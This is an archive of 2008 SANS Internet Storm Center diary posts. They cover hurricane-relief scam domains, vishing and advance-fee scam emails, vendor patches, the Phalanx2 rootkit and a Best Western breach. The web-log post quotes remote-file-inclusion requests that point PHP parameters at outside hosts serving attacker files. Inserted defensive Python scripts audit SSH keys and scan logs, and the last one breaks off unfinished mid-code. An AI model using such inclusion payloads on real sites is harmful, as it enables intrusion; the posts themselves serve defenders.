Diaries

Published: 2008-08-31

More Hurricane Domains

Yesterday we posted a list of new domains registered in anticipation of hurricane Gustav hitting the US gulf coast.  In the past 24 hours even more domains were registered.  Most of these sites are parked domains and many of them are for sale.  They will be worth monitoring, particularly if "donate here" messages appear.  Please make sure that your employees or customers verify any site that asks for donations to ensure that it is legitimate.  If you have any doubts, please visit the Better Business Bureau's web site.

Here are the domains we are aware of that were registered in the past 24 hours.  As with yesterday's list, we pulled this from the good people at Domain Tools.  You'll see a few hurricane Hanna sites showing up too.

boredatgustavus.net
contributegustav.org
contributiongustav.org
donategustav.org
donationgustav.org
gustav-hurricane.info
gustav-hurricane.net
gustav-hurricane.org
gustav-hurricane.us
gustav-relief.org
gustavassistance.org
gustavattorney.com
gustavcharities.com
gustavcharity.com
gustavclaims.net
gustavcontribution.org
gustavdonation.com
gustavfound.com
gustavhelpers.org
gustavhurricanerelief.com
gustavhurricanerelief.info
gustavhurricanerelief.net
gustavhurricanerelief.org
gustavlawsuit.com
gustavlawyer.com
gustavlegalrelief.com
gustavlegalrelief.info
gustavlouisiana.org
gustavmissing.com
gustavneworleans.com
gustavneworleans.org
gustavpictures.com
gustavrecovery.org
gustavrelief.info
gustavrelieffund.com
gustavrelieffund.org
gustavreliefvolunteers.com
gustavresponse.com
hannahrelief.org
hannainsuranceclaim.com
hannalawyer.com
hannarelief.org
helpgustavvictims.com
helpgustavvictims.net
helpgustavvictims.org
hurricanegustav08.com
hurricanegustave.info
hurricanegustavphotos.com
hurricanegustavrelief.info
hurricanegustavrelief.net
hurricanegustavrelief.org
hurricanegustavrepair.com
hurricanegustavresponse.info
hurricanegustavvictims.info
hurricanegustavvictims.org
hurricanehelp.us
hurricanelinks.info
hurricanelinks.org
hurricanerelo.com
hurricanerelo2ms.com
hurricanerelocate.com
hurricaneresponder.com
hurricaneseasonflorida.com
hurricanetrack.org
hurricanevolunteers.info
hurricanewatchnet.org
hurricanework.com
isurvivedhanna.com
lahurricanerelief.org
myhurricanephotos.com
netexashurricaneresponse.info
officialhurricanegustav2008.info
survivedgustav.com
survivedgustav.net

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2008-08-30

Help us Leap Ahead

Readers, we (the Internet Storm Center) were asked to help with a project to find a few game-changing ideas in cyber security. We've been asked to seek ideas from our global readership - that's you - for technology (or non-technical mechanisms which are made possible through technology) which can be deployed over the next decade to change the cyber game into one which the good guys can win.

Unlike many research agendas that aim for steady progress in the advancement of science, this project seeks just a few revolutionary ideas with the potential to reshape the landscape.  Also different is that the project targets a time horizon of about a decade from now for palpable impact, so along with the new concepts we must also describe the strategy that brings those ideas to fruition.  In other words, they are looking for ideas that can be developed quickly and will show results within the next ten years, but they also need a strategy for getting the idea into use.

Exploring the problem through a "game-changing" metaphor to stimulate new thinking, they are looking for ideas that change the rules of the game, change the stakes, or change the game board.  So we are looking for a couple of candidates for the big idea.  Do you have any ideas?  If so, send them to us via the contact form and we'll post them here for others to see and discuss.  Please keep your idea brief, don't worry about the details for now.  Just what is the technology (or non-technical mechanism made possible through technology) that you think might change the game?  However, do start thinking about how your idea would be carried out and what roadblocks might prevent it from being deployed.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2008-08-30

Here we go again - Hurricane Relief Sites

Remember three years ago when hurricanes Katrina and Rita hit the US Gulf coast?  On the day Katrina hit New Orleans hundreds of donation sites appeared online, many if not most were scam sites.  Well this time around it looks like the people who like to register domain names in anticipation of a storm's arrival have already started registering them for Gustav and Hanna.  I'm not suggesting that they are up to no good, but simply pointing out that the rush has started and we need to make sure our users are aware of the potential for scam sites appearing online in the next few days.

For example, these domains were registered in the past 24 hours according to Domain Tools:

aidforgustav.com
gustav-recovery.com
gustav08.com
gustavcharities.org
gustavcharity.org
gustavcontractor.com
gustavdonation.org
gustavdonations.com
gustavdonations.org
gustavfund.org
gustavjamaica.com
gustavsecurity.com
gustavsupport.com
gustavupdates.com
gustavvictims.com
gustavvolunteers.com
hurricanegustavrecovery.com
hurricanegustavresponse.com
isurvivedgustav.com
killergustav.com
officialhurricanegustav2008.com
reliefforgustav.com
trackgustav.com
trackgustav.net
victimsofgustav.com

I checked several of them and the sites I viewed are just parked with a "for sale" sign on them.  Nothing wrong with that, but it's only a matter of time before the "donate here" buttons start showing up.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2008-08-29

Scammers may use recorded snippets during voice phishing

The vishing (voice phishing) incident described in an earlier diary seemed to use a rudimentary voice synthesizer to request information from the caller. An ISC reader noted that in more sophisticated attacks, scammers employ "sampling"--recorded snippets of actual calls to sound more legitimate.

He submitted the following outline of the call he received the other day:

"XXX Bank values your business, please hold for next representative."

Hold music plays...

"Call being transferred to automated information system."

The above seemed to be recorded sound files from an actual call to the bank, as this is exactly what you would hear if you called the bank and chose to use their automated system.

"You have been selected to receive a special offer from XXX Bank. For a limited time you can receive 0% interest for 6 months on existing balances on your XXX Bank card. You can apply over the phone or online at www dot XXX Bank dot com. Press 1 to apply now."

You press 1 (or any number).

"To apply for the offer please enter your credit card now" (Computer generated voice)

You enter the card number.

"Please enter your PIN number now."

You enter the PIN.

"Thank you, processing account information now."  (Again, a recorded snippet from the real bank's voice system.)

"Your request has been processed and will appear on your next account statement, goodbye." (wav file sampled from the bank's real voice mail system.)

The ISC reader pointed out that this call highlights the following evolution in the scammers' tactics:

  • They had put effort into sampling real voice prompts from the bank's automated phone system.
  • They gave out the bank's real web address, presumably to give an air of legitimacy to the call.

Thanks, ISC reader!

-- Lenny

Lenny Zeltser leads a regional security consulting team at Savvis and teaches a course on reverse-engineering malware at SANS.

0 Comments

Published: 2008-08-29

VMware releases updates - don't forget to patch

An ISC reader notified us that VMware released updates for ACE, Server, Player and Workstation products:

According to VMware, the following 3 security issues are patched by the updates for VMware ACE, Player and Workstation:

  • Setting ActiveX killbit. "VMware has set the killbit on its ActiveX controls. Setting the killbit ensures that ActiveX controls cannot run in Internet Explorer (IE), and avoids security issues involving ActiveX controls in IE."
  • Update to FreeType. "FreeType 2.3.6 resolves an integer overflow vulnerability and other vulnerabilities that can allow malicious users to run arbitrary code or might cause a denial-of-service after reading a maliciously crafted file."
  • Update to Cairo. "Cairo 1.4.12 resolves an integer overflow vulnerability that can allow malicious users to run arbitrary code or might cause a denial-of-service after reading a maliciously crafted PNG file."

The following 4 security issues are patched by the updates for VMware Server:

  • Security Fix for VMware ISAPI Extension. "One of the ISAPI extensions provided by VMware is vulnerable to a remote denial of service. "
  • Security Fix for Local Privilege Escalation on Host System. "Exploitation of this vulnerability allows users to run arbitrary code on the host system with elevated privileges."
  • Update to Freetype. "FreeType 2.3.6 resolves an integer overflow vulnerability and other vulnerabilities that can allow malicious users to run arbitrary code or might cause a denial-of-service after reading a maliciously crafted file."
  • Setting ActiveX killbit. "VMware has set the killbit on its ActiveX controls. Setting the killbit ensures that ActiveX controls cannot run in Internet Explorer (IE), and avoids security issues involving ActiveX controls in IE."

Patching VMware is never a pleasant experience, and usually involves a heavy download and a lengthy installation, not to mention the testing to ensure your environment is not adversely affected by the patch. What's a better way to spend your weekend?

-- Lenny

Lenny Zeltser leads a regional security consulting team at Savvis and teaches a course on reverse-engineering malware at SANS.

0 Comments

Published: 2008-08-29

Scams from today's mailbag

Here are a few scam-related messages we received in the inbox today. A common thread is that the scammers keep thinking creatively about lowering the recipient's guard:

  • The first example is a VoIP-based phishing (vishing) attack, where the scammer exploits people's tendency to trust the phone more than email.
  • In the next example, the scammer avoids asking for or promising money directly, so as not to arouse suspicions prematurely.
  • In the last example, the scammer acknowledges the dangers of scams, and claims to offer support to people who fell victim to them.

VoIP Phishing

Mike sent us a copy of a message that claimed to come from the City Credit Union, and asked the recipient to call a particular number because the recipient's account was temporarily suspended:

From: City Credit Union [mailto:do-not-reply@citycu.org]
Date: Friday, August 29, 2008
Subject: PLEASE CALL US! Account Temporary Suspended !

Dear Customer,

On August 28 14:28:34 EST 2008 you or someone changed your online password on City Credit Union website.

For security reasons, your account was temporary suspended.
If this request was not performed by you please log in and solve the problem.
To continue please call us at:

(214) 431-4XXX

We replaced the last 3 digits with XXX, just in case. According to Mike, when you call, "you get a very old style computer voice asking you to input your debit credit card number." Mike is a customer of City Credit Union.

A very similar scam was reported by the Blog of Scams a few days ago--very similar text, but it referred to APL Federal Credit Union instead. For additional examples of vishing, see an earlier diary.

Baiting the Victim

In the next, unrelated example from today's mailbag, we encounter the dying widow of an arms dealer, looking to make friends on the Internet:

From: Hilary Whitney [hilaryw.......@gmail....]
Date: Friday, August 29, 2008
Subject: Good day

Beside India House
Aldwvch London WC2B 4NA.
Email; mrsshilarywhitney@yahoo.co.uk

Good day

Am glad to have the opportunity to contact you  with the labtop the nurse brings for me. ...

I am married to late Mr Cosmos Whitney,a licensed arms dealer and a soldier before he died in the year 1998. ... Presently,my doctor told me that i would not last for the next 30 days due to a rare form of cancer of the pancress. ...

Presently,my doctor told me that i would not last for the next 30 days due to a rare form of cancer of the pancress. ... i hoped to find a good person whom i can find trust worthy to stand as a good friend  since i don't have any relatives,friends and children's as well.And also since i have limited time to live.

I want to know if your a honest and caring person,because am not used to internet friends.

Notice that the message implies that the sender is wealthy, and without anyone to receive the inheritance when she passes away. This detail is meant to bait the recipient, who might hope to get the money after befriending Mrs. Hilary Whitney. While this message was submitted via email, a version of it was also distributed via blog spam as early as May 23, 2008.

Scammers Against Scams

Our last example seems to be an outreach email for helping victims of Nigerian-style scams. In reality, it is an attempt to gain the recipients' trust to defraud them. The technique is similar to the example we described in an earlier diary.

From: "Brian Adams" <baantinigeriascams@gmail.com>
Date: Sat, 23 Aug 2008
Subject: Anti Nigeria Scams Ref: 23524326

Attention:

This email is not in any manner directed to you, but its purposely and specifically directed to Nigeria Scam victims. . However, if you have fallen for Nigerian Scams, do not hesitate to contact us or visit our website for more details on how we can help.

We shall be waiting to hearing from you been certain that you were truly scammed by a Nigerian and you have proves to back your claims. Please read the full report at our website:
http://www.nigeria-scamvictims.itgo.com/

Yours faithfully,

Brian Adams
Nigerian Government Reimbursement Committee

Several instances of this scam were observed on the web recently (see 1, 2), and a Google search for "Nigerian Government Reimbursement Committee" shows numerous hits that suggest fraudulent activities.

-- Lenny

Lenny Zeltser leads a regional security consulting team at Savvis and teaches a course on reverse-engineering malware at SANS.


0 Comments

Published: 2008-08-29

SWOT matrix for describing security posture

"Be brief, for no discourse can please when too long." Miguel de Cervantes
"When I try to be brief, I become obscure." Quintus Horatius Flaccus

How can you outline a system's security state succinctly, yet without omitting important points? Consider using the SWOT matrix to summarize your perspective. This approach is particularly effective when communicating with managers and executives, who are usually familiar with SWOT analysis.

The acronym SWOT, which stands for Strengths, Weaknesses, Opportunities and Threats, is designed to remind you of the key factors to consider when analyzing a situation. A SWOT matrix is a table that presents these elements in a compact manner. Take a look at the SWOT matrix template below. (It is based on an image from Wikipedia.)

The left column lists helpful, positive factors; the right one lists harmful, negative factors. The top row includes the factors intrinsic to the analyzed system; the bottom one includes factors external to the system.

Let's examine the contents of each cell in the SWOT matrix:

(Image: SWOT Matrix)

Strengths lists the most effective security aspects of the system, for example tight network access controls or comprehensive security policies. Improvements to the system's security can be accomplished by building upon these strengths.

Weaknesses outlines those aspects of the system that put it at risk, for instance poor input validation, or lack of effective log management. These aspects of the system should be improved.

Opportunities describes factors external to the system that can help improve its security. This might be the availability of security training funds for developers, or the existence of a logging system that has been purchased, but was never deployed. Items in this cell might be low-hanging-fruit--easy wins that can improve the system's security.

Threats highlights external factors that magnify the adverse effects of internal system weaknesses. For instance, the company may be subject to fine-imposing regulations, or may possess weak change management practices.

The SWOT matrix approach is particularly powerful when the company defines the objective with respect to which the system should be evaluated. In the context of information security, this usually involves agreeing on the system's risk profile, data sensitivity, business goals, and other factors that affect the system's security architecture.

If you like this approach, you are welcome to use the editable SWOT matrix template I created in Microsoft Word. You can download it from here.

Further information: For information about the classic use of SWOT analysis, take a look at the corresponding Wikipedia article. Security management topics such as SWOT analysis are explored in the SANS MGT-512 course. If you found this note useful, you may also enjoy my earlier tip on using an "elevator pitch" for explaining security risks to executives.

-- Lenny

Lenny Zeltser leads a regional security consulting team at Savvis and teaches a course on reverse-engineering malware at SANS.

0 Comments

Published: 2008-08-28

IE8 Beta 2 Released: InPrivate Browsing

Microsoft has put IE8 into its second beta and there are a variety of new features.  The one most interesting from a security perspective is "InPrivate", which lets users more tightly control what cookies get stored (and how they are used) and the settings that control the browser history.  This is largely seen as a slap at Google and Yahoo, since it gives IE users a built-in way to limit the amount of profiling web advertising companies can do to target their advertisements.  It remains to be seen whether this will be used in an even-handed way, but it is a good reminder to people of how much data advertising companies such as Google can generate about their users.  Nothing in life is free, and if you aren't paying for those services, Google is getting paid by someone. :)

Some people couldn't care less; others are more stringent about their privacy.  There are equivalents in the Firefox world (AdBlock, etc.), but Microsoft seems to be trying to position itself as the protector of privacy in the new web world order.  We'll see how that works out (because MSFT is an advertiser itself, with its own ad network).

--
John Bambenek
bambenek /at/ gmail \dot\ com

1 Comments

Published: 2008-08-28

When using fear to sell security can backfire

If you are a security professional, you need to possess strong persuasion skills. This doesn't apply solely to employees of security vendors. Even if your job is internally-focused, you still need to convince your colleagues to consider security when processing data, building systems, interacting with partners, etc. Since these individuals often do not report to you, you have to exercise your persuasion abilities to achieve the desired results.

Highlighting the importance of security often incorporates an element of scare tactics: describing threats, explaining the repercussions of ignoring security, or providing examples where inadequate security led to disastrous consequences. The approach is used in both internal security awareness sessions and security product literature.

Fear is a key element in the often vilified trio of fear, uncertainty, and doubt (FUD). Indeed, when used without restraint, fear can backfire.

First, there's the boy who cried wolf syndrome. The infamous fable refers to a protagonist who issued so many false alarms about the wolf's impending attack that the villagers did not believe him when the calamity actually occurred. "The liar will lie once, twice, and then perish when he tells the truth." If resorting to fear, be sure to have your facts straight, and be ready to substantiate your claims if challenged.

Furthermore, while fear can be an effective element of persuasion, it can also paralyze the audience into inaction. This point is emphasized by the authors of Yes!: 50 Scientifically Proven Ways to Be Persuasive. They confirm that "fear-arousing communications usually stimulate the audience to take action to reduce the threat." With one exception:

"When the fear-producing message describes danger but the audience is not told of clear, specific, effective means of reducing the danger, they may deal with the fear by 'blocking out' the message or denying that it applies to them."

In your internal or outbound communications, be very clear about what steps the audience can take to reduce the risks you're describing. Otherwise, your scare tactics might backfire, with the audience tuning out completely. (If you're interested in the chapter from the Yes! book that deals with fear and persuasion, you can read it here. The text references a 1965 study that tested the effectiveness of fear in the context of medical inoculation brochures, which is summarized here.)

-- Lenny

Lenny Zeltser leads a regional security consulting team at Savvis and teaches a course on reverse-engineering malware at SANS.

0 Comments

Published: 2008-08-26

Active attacks using stolen SSH keys (UPDATED)

US-CERT is reporting that there are active attacks against Linux environments using stolen SSH keys.  There is a new rootkit out, Phalanx2, which is dropped by attackers and which, among the usual rootkit tasks, steals any SSH key on the system.  The attackers then, presumably, use those stolen keys (at least the ones without passwords/passphrases) to get into other machines.

Sources of compromised keys could include the weak key vulnerability in Debian-based systems a few months ago, so if you haven't updated and replaced those keys, you ought to do so now.

The biggest defense is to have any keys, especially those used to authenticate to remote machines and certainly internet-facing ones, require a passphrase to use.  Check your logs, especially if you use SSH key-based auth, to identify accesses from remote machines that have no business accessing you.  If you have IPs, that would be good.

To detect if you have Phalanx2, look for /etc/khubd.p2/ (access by cd, not ls) or any directory that is called "khubd.p2".  /dev/shm/ may contain files from the attack as well.  Tripwire, AIDE and friends should also be able to detect filesystem changes.
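The checks from the two paragraphs above (passphrase-less keys, the khubd.p2 directory, files in /dev/shm) as one host-audit script. This is an added example, not code from the diary, US-CERT or any Phalanx2 write-up. It assumes the Linux layout the diary names (/etc, /dev/shm, /root/.ssh, /home/*/.ssh), takes a root directory so it can first be tried on the constructed tree it builds, and the key files in that tree are dummies, not real key material.

```python
"""Audit a host for the Phalanx2 indicators named in the diary: a khubd.p2
directory (probed directly by name, since the diary warns 'ls' may not show
it), leftover files in /dev/shm, and SSH private keys with no passphrase.
Added example, not ISC or US-CERT code. 'root' lets it run against the
constructed tree below or against '/' on a real host."""
import base64
import os
import struct
import tempfile

ROOTKIT_DIR = "khubd.p2"
OPENSSH_MAGIC = b"openssh-key-v1\x00"


def probe_known_path(root):
    """Stat /etc/khubd.p2 by name, the way 'cd' would. A rootkit that
    filters directory listings may still answer a direct stat."""
    path = os.path.join(root, "etc", ROOTKIT_DIR)
    return path if os.path.isdir(path) else None


def find_rootkit_dirs(root):
    """Walk the tree for any directory named khubd.p2. This relies on
    directory listings, so a miss here is weaker evidence than the probe."""
    hits = []
    for dirpath, dirnames, _ in os.walk(root):
        hits += [os.path.join(dirpath, d) for d in dirnames if d == ROOTKIT_DIR]
    return sorted(hits)


def shm_files(root):
    """Everything under /dev/shm; the diary notes attack files land there."""
    shm = os.path.join(root, "dev", "shm")
    return sorted(os.path.join(shm, f) for f in os.listdir(shm)) if os.path.isdir(shm) else []


def key_is_encrypted(path):
    """True when the private key needs a passphrase: PEM keys carry a
    'Proc-Type: 4,ENCRYPTED' header; openssh-key-v1 keys record the cipher
    name in their header, and 'none' means no passphrase."""
    with open(path, "rb") as fh:
        data = fh.read()
    if b"Proc-Type: 4,ENCRYPTED" in data:
        return True
    if data.startswith(b"-----BEGIN OPENSSH PRIVATE KEY-----"):
        body = b"".join(ln for ln in data.splitlines() if not ln.startswith(b"-----"))
        raw = base64.b64decode(body)
        if raw.startswith(OPENSSH_MAGIC):
            off = len(OPENSSH_MAGIC)
            (clen,) = struct.unpack(">I", raw[off:off + 4])
            return raw[off + 4:off + 4 + clen] != b"none"
    return False  # unknown layout: report it so a human looks at it


def find_unprotected_keys(root):
    """Private keys in /root/.ssh and /home/*/.ssh that lack a passphrase;
    those are the ones the diary says get reused against other hosts."""
    home = os.path.join(root, "home")
    ssh_dirs = [os.path.join(root, "root", ".ssh")]
    if os.path.isdir(home):
        ssh_dirs += [os.path.join(home, u, ".ssh") for u in os.listdir(home)]
    found = []
    for d in filter(os.path.isdir, ssh_dirs):
        for f in os.listdir(d):
            p = os.path.join(d, f)
            if not os.path.isfile(p):
                continue
            with open(p, "rb") as fh:
                head = fh.readline()
            if head.startswith(b"-----BEGIN") and b"PRIVATE KEY" in head and not key_is_encrypted(p):
                found.append(p)
    return sorted(found)


def audit(root="/"):
    return {"rootkit_probe": probe_known_path(root),
            "rootkit_dirs": find_rootkit_dirs(root),
            "shm_files": shm_files(root),
            "unprotected_keys": find_unprotected_keys(root)}


def build_sample_tree():
    """Constructed fixture: one infected host with the indicators above and
    three keys (alice: PEM, no passphrase; bob: PEM, encrypted; root:
    openssh-key-v1 with cipher 'none'). Key bodies are dummies, not keys."""
    root = tempfile.mkdtemp()

    def write(rel, data):
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb") as fh:
            fh.write(data)

    os.makedirs(os.path.join(root, "etc", ROOTKIT_DIR))
    write("dev/shm/.x", b"junk")
    write("home/alice/.ssh/id_rsa", b"-----BEGIN RSA PRIVATE KEY-----\nMIIEdummy\n-----END RSA PRIVATE KEY-----\n")
    write("home/bob/.ssh/id_rsa", b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
          b"DEK-Info: AES-128-CBC,00\n\nMIIEdummy\n-----END RSA PRIVATE KEY-----\n")
    write("home/bob/.ssh/id_rsa.pub", b"ssh-rsa AAAAdummy bob\n")
    hdr = OPENSSH_MAGIC + struct.pack(">I", 4) + b"none" + struct.pack(">I", 4) + b"none"
    write("root/.ssh/id_ed25519", b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
          + base64.b64encode(hdr) + b"\n-----END OPENSSH PRIVATE KEY-----\n")
    return root


if __name__ == "__main__":
    import json
    print(json.dumps(audit(build_sample_tree()), indent=2))
```

Run it as root with `audit("/")` on a suspect host. A key it reports as unprotected should either get a passphrase (`ssh-keygen -p`) or, if the host may already be compromised, be treated as stolen: generate a replacement and remove the old public half from every authorized_keys file that trusts it. Remember that the walk depends on directory listings the rootkit may filter, so the direct probe and a file-integrity tool such as Tripwire or AIDE are the stronger signals.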

UPDATE:  A couple of quick updates.  Fellow Handler Bill Stearns mentioned several tools like this that can sniff out vulnerable keys.  Also, here are some more technical details on the phalanx2 rootkit.

--
John Bambenek
bambenek /at/ gmail \dot\ com


0 Comments

Published: 2008-08-26

Podcast Episode X Record Notice

Tomorrow night at 7:30 EDT (Eastern Daylight Savings Time) Johannes, John, and I will be recording Episode X of the Internet Storm Center Podcast.

We'll be broadcasting live at http://www.stickam.com/joelesler

Please come and join!  We love live feedback, talk with us in the stickam interface or via IRC in #dshield on irc.freenode.net.

Thanks!

-- Joel Esler http://www.joelesler.net

0 Comments

Published: 2008-08-25

The Latest in Crimeware

Brian Krebs over at the Washington Post has a series of stories up (dubbed Web Fraud 2.0) at the SecurityFix Blog on some of the developments in crimeware tools.  However, these tools operate on the opposite side of the fraud equation.  Namely, instead of malware that infects machines, it's more the underground economy of what to do with that information and the facilitation of that activity.  It's a neat look at what "the other guys" are doing and how the electronic fraud market is an evolving and thriving one.

--
John Bambenek
bambenek /at/ gmail \dot\ com

0 Comments

Published: 2008-08-25

Thoughts on the Best Western Compromise

The Sunday Herald reported on Sunday that Best Western was struck by a trojan attack that led to the possible compromise of about 8 million victims. There is some debate as to the extent of the breach and not a small amount of rumor going around. I'm not entirely disposed to trust corporate press releases for the facts, nor am I going to blindly accept claims of security researchers whose first call is to the PR team when discovering a problem.

That said, here is what seems to be the agreed upon facts:

- A trojan was installed on one of the machines in Best Western's booking systems, which led to a compromise of credentials for the hotel's staff. Attempts were made (probably successfully) to sell these credentials to organizations with links to the Russian mafia.

- Best Western is and was PCI DSS compliant.

Of course, PCI really only helps one piece of the security equation and compliance is not the same as security. In fact, it is usually (at best) a poor substitute and more often an excuse to stop thinking about security ("We're Compliant!" followed by self-congratulatory back slapping). The same is true with relying on encryption. Encryption can be "defeated" and the ways to do it are well-known. (For instance, here is a paper I wrote almost 4 years ago on how to do it). If you can own the endpoint of a communication, encryption is irrelevant.

As another example, remember the backup tape heists a few years ago? Attackers know it takes an excessive amount of time to crack encryption, so they target ways to avoid it. Someone had the great idea of stealing backup tapes, which at that point few people would even have thought to protect. Now it's due diligence.

That said, here are 5 areas that are likely targets in the near future (or are targets now) that you may be overlooking:

- Centralized patching systems (e.g. WSUS). If you can hijack an update server and have it distribute a malicious patch, you own every desktop in an environment. The RedHat compromise should be a wake-up call in this regard.

- Centralized configuration and management systems (e.g. Configuresoft or the like). Same as above... the machine that controls all your desktops becomes the single point of pwnership.

- Payroll. Your payroll system has salary information and identification information. In short, it has everything you need to commit tax fraud. In the US, in particular, it also has your national identification number (what is falsely called a "Social Security Number") which allows an attacker to basically jack your entire identity as well.

- Web 2.0. There have been some attempts to spread malware or spear phish using Web 2.0 technology. In as far as your organization uses Web 2.0, the more "legitimate" a message looks, the more likely a user is to click it. Web 2.0 provides a great vector to compromise an organization, especially if many of your employees use it. (Think social engineering).

- Malicious insiders. Ok, this last one is not new, but still a solid majority of attacks have at least some component of an insider attack. In some cases, simply installing a keylogger and "selling" the result is simple enough for a disgruntled employee with even a token level of access to an environment.

Will put up more info on Best Western as the situation warrants. Thoughts on the top 5 list? What would you add or take off?

--
John Bambenek
bambenek /at/ gmail \dot\ com

1 Comments

Published: 2008-08-24

Warning, it's not from us.

I received an email today from a reader (thank you) who reported that they received a piece of spam today that came from the address: monitoring@isp.com.  (Notice the domain name.)  Now, we have seen this type of spam before, you know, posing as if it comes from your ISP while just having a malicious link in it, etc.

Except this time the spam was signed "ISC monitoring team"  (Notice the first three letters, and how they differ from the domain name).  So I am guessing that someone is trying to imitate us.  And while we recognize that imitation is the sincerest form of flattery, this kind could actually be damaging.

Rest assured our faithful readers, this is not from us.  First of all our email addresses are not "isp.com", nor "monitoring".  We don't sign our emails "ISC monitoring team".  Nor do we spell the word "Consortium" -- "Consorcium".  (misspelling from the email.)

So I'll give you a piece of advice that I gave my father this morning: if you don't know who the email came from, or the email doesn't pertain to you, do one of two things about it: mark it as spam (to help train your spam filters), or delete it.  Obviously, this doesn't apply to everyone, but give it a shot and see where you get with it!

Thanks readers for staying on your toes!


-- Joel Esler http://www.joelesler.net


1 Comments

Published: 2008-08-23

SQL injections - an update

In an earlier story we looked at an SQL injection that has infected close to 1.5 million sites.  The same search now only returns about 175K sites and many of those are discussing the injection.  The URLs I checked were all dead links, so well done everybody in cleaning up aisle 3.

With regards to the second set of SQL injections we talked about here, the number of successful injections is still going up.  When I first came across these about 4.5K sites were injected; now we are up to 33K.  Not a real success story for this particular attack.  The error with the 06014.html page is still not fixed.  The only variation I've seen so far is the target URL, which changes; the rest is pretty much the same, and the end game is still the stealing of WOW passwords.

People have reported that typically they get two hits from the one IP address and then it moves along. 

Keep an eye on your logs and consider implementing an IDS or use tools such as suhosin for PHP sites,  mod_security for apache, or any other url checking/sanitisation tool.

Mark - Shearwater

0 Comments

Published: 2008-08-22

RedHat compromise sparks a Critical openssh security update

Critical: openssh security update

"Last week Red Hat detected an intrusion on certain of its computer systems and took immediate action". "In connection with the incident, the intruder was able to sign a small number of OpenSSH packages relating only to Red Hat Enterprise Linux 4  (i386 and x86_64 architectures only) and Red Hat Enterprise Linux 5 (x86_64 architecture only)".

"processes and efforts to date indicate that packages obtained by Red Hat Enterprise Linux subscribers via Red Hat Network are not at risk".

Affected Products:
Red Hat Desktop (v. 4)
Red Hat Enterprise Linux (v. 5 server)
Red Hat Enterprise Linux AS (v. 4)
Red Hat Enterprise Linux AS (v. 4.5.z)
Red Hat Enterprise Linux Desktop (v. 5 client)
Red Hat Enterprise Linux ES (v. 4)
Red Hat Enterprise Linux ES (v. 4.5.z)
Red Hat Enterprise Linux WS (v. 4)

CVEs (cve.mitre.org): CVE-2007-4752

0 Comments

Published: 2008-08-22

RedHat - Fedora Servers Compromised

A RedHat list post acknowledges that last week "some Fedora servers were illegally accessed. The intrusion into the servers was quickly discovered, and the servers were taken offline.

Security specialists and administrators have been working since then to analyze the intrusion and the extent of the compromise as well as reinstall Fedora systems".

0 Comments

Published: 2008-08-22

MS08-051 V2.0 Patch issued August 20, 2008

"Microsoft has posted new update packages, labeled Version 2, for Microsoft Office PowerPoint 2003 Service Pack 2 and Microsoft Office PowerPoint 2003 Service Pack 3" described in MS08-051, Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (949785)

"Customers who manually installed Version 1 of this update from Microsoft Download Center need to reinstall Version 2 of this update.

Customers who have installed this update using Microsoft Update or Office Update do not need to reinstall".

Others should check with their patch management vendors.

The original patch "contained incorrect versions of the binaries. While these versions did protect against the vulnerabilities discussed in the bulletin, they lacked other important security and reliability updates".

 

0 Comments

Published: 2008-08-20

From the mailbag, Opera 9.52...

From  their changelog "Opera 9.52 is a recommended security and stability upgrade."

Cheers,
Adrien de Beaupré
intru-shun.ca

0 Comments

Published: 2008-08-19

A morning stroll through my web logs

As I have done before, I would like to take you all on a quick stroll through some recent web-server logs from the ISC web server. This time around, lets look at some of the 404 errors.

We all know those 404 errors. Most of the time, they can be explained as typos, links to outdated URLs or other innocent mistakes. However, here some that are not quite as "obvious":

File does not exist: /home/live/isc/html/include
File does not exist: /home/live/isc/html/modules

Someone looking for a browsable directory listing of include files? I do see a lot of them lately! No referer on any of them. And then we have this URL that is hit quite a few times:

File does not exist: /home/live/isc/html/authentication

Some are quite odd and specific (only one hit to this one):

script '/home/live/isc/html/todofleetcontrol.php' not found or unable to stat

No, the ISC does not have a Fleet to control. But we are still looking for someone to donate a nice plane (with fuel!) to be used as "ISC1" (an A380 would be nice, but a Boeing 747 will do).

Here are a few more that are quite specific:

And of course, this wouldn't be complete with some attempts to exploit non-existing vulnerable PHP software:

"GET //includes/functions_portal.php?phpbb_root_path=http:// m4ng4.100webspace. net/id2.txt?? 
    HTTP/1.1" 404 5096 "-" "libwww-perl/5.810" "-"
GET //PhpLinkExchange/bits_listings.php?svr_rootP=http:// warsector. ru/access2006.log??? 
    HTTP/1.1" 404 5097 "-" "libwww-perl/5.79"
"GET /protection.php?action=logout&siteurl=http:// warsector. ru/access2006.log??? 
    HTTP/1.1" 404 5478 "-" "libwww-perl/5.65" "-"
"GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www. v8rx7forum.com/images/icons/header.txt???? 
    HTTP/1.1" 404 5078 "-" "libwww-perl/5.79" "-"
"GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www. kupc.org /zero/bbs//skin/zero_vote/ooid.txt???? 
    HTTP/1.1" 404 5102 "-" "libwww-perl/5.79" "-"
"GET /errors.php?error=http:// brnthug .awardspace.com/TT??? 
    HTTP/1.1" 404 5481 "-" "libwww-perl/5.811" "-"

As you can tell, none of these bother to even fake a user agent. Blocking libwww-perl is frequently done (e.g. via mod_rewrite), but in my case, there are some legit scripts that query the site. Got any cool and unique web logs? Send them in!
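As an added example (not code from the diary), here is a small Python scanner that parses combined-format Apache log lines, flags requests whose query parameters carry an absolute URL (the remote-file-inclusion pattern in the probes above) and reports the user agent alongside, so that the payload rather than the libwww-perl agent string is what drives the alert. The log lines embedded in it are constructed, and the remote hosts are placeholder names, not the ones quoted in the diary.

```python
"""Spot remote-file-inclusion (RFI) probes in Apache combined-format access logs.

Added example, not code from the ISC diary. The sample lines below are
constructed for this example; the remote hosts are placeholders (RFC 2606
names), not the hosts that appear in the diary.
"""
import re
from urllib.parse import parse_qsl

# One regex for the Apache "combined" format:
# host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
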